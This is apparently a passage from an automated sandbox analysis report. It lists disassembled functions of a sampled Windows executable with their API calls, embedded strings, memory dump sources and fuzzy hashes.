                                                              • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                              • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                              Function 0041CED8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                              • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                              • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                              • RealizePalette.GDI32(?), ref: 0041CF92
                                                              • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                              • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                              • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                              • String ID:
                                                              • API String ID: 2222416421-0
                                                              • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                              • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                              • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                              • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                              Function 004572DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                              • TranslateMessage.USER32(?), ref: 004573B3
                                                              • DispatchMessageA.USER32(?), ref: 004573BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                              • String ID: [Paused]
                                                              • API String ID: 1007367021-4230553315
                                                              • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                              • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                              • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                              • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                              Function 0046B420 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                              • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                              • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LoadSleep
                                                              • String ID: CheckPassword
                                                              • API String ID: 4023313301-1302249611
                                                              • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                              • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                              • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                              • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                              Function 00477C6C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                              • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                              • GetTickCount.KERNEL32 ref: 00477CE6
                                                              • GetTickCount.KERNEL32 ref: 00477CF0
                                                              • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                              Strings
                                                              • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                              • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                              • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                              • API String ID: 613034392-3771334282
                                                              • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                              • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                              • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                              • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                              Function 00459784 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                              Strings
                                                              • CreateAssemblyCache, xrefs: 00459836
                                                              • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                              • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                              • Fusion.dll, xrefs: 004597DF
                                                              • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                              • API String ID: 190572456-3990135632
                                                              • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                              • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                              • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                              • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                              Function 0041C148 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                              • GetFocus.USER32 ref: 0041C168
                                                              • GetDC.USER32(?), ref: 0041C174
                                                              • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                              • RealizePalette.GDI32(?), ref: 0041C1A1
                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                              • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                              • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                              • String ID:
                                                              • API String ID: 3303097818-0
                                                              • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                              • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                              • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                              • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                              Function 00418C54 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                              • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                              • 6F542980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                • Part of subcall function 004107F8: 6F53C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                              • 6F5ACB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                              • 6F5AC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                              • 6F5ACB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                              • 6F540860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$C400C740F540860F542980
                                                              • String ID:
                                                              • API String ID: 3392676452-0
                                                              • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                              • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                              • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                              • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                              Function 00483C6C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                              • API String ID: 47109696-2530820420
                                                              • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                              • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                              • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                              • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                              Function 0041B462 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                              • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                              • DeleteDC.GDI32(?), ref: 0041B4D9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$Delete$Stretch
                                                              • String ID:
                                                              • API String ID: 1458357782-0
                                                              • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                              • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                              • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                              • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                              Function 00495508 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00495519
                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                              • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                              Strings
                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 2948443157-222967699
                                                              • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                              • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                              • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                              • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                              Function 00423394 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32 ref: 004233AF
                                                              • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                              • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                              • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                              • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                              • SetCursor.USER32(00000000), ref: 00423413
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                              • String ID:
                                                              • API String ID: 1770779139-0
                                                              • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                              • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                              • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                              • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                              Function 0049532C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                              • API String ID: 667068680-2254406584
                                                              • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                              • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                              • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                              • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                              Function 0045D688 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(02370000,BZ2_bzDecompressInit), ref: 0045D691
                                                              • GetProcAddress.KERNEL32(02370000,BZ2_bzDecompress), ref: 0045D6A1
                                                              • GetProcAddress.KERNEL32(02370000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                              • API String ID: 190572456-212574377
                                                              • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                              • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                              • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                              • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                              Function 0042EA1C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                              • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                              • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
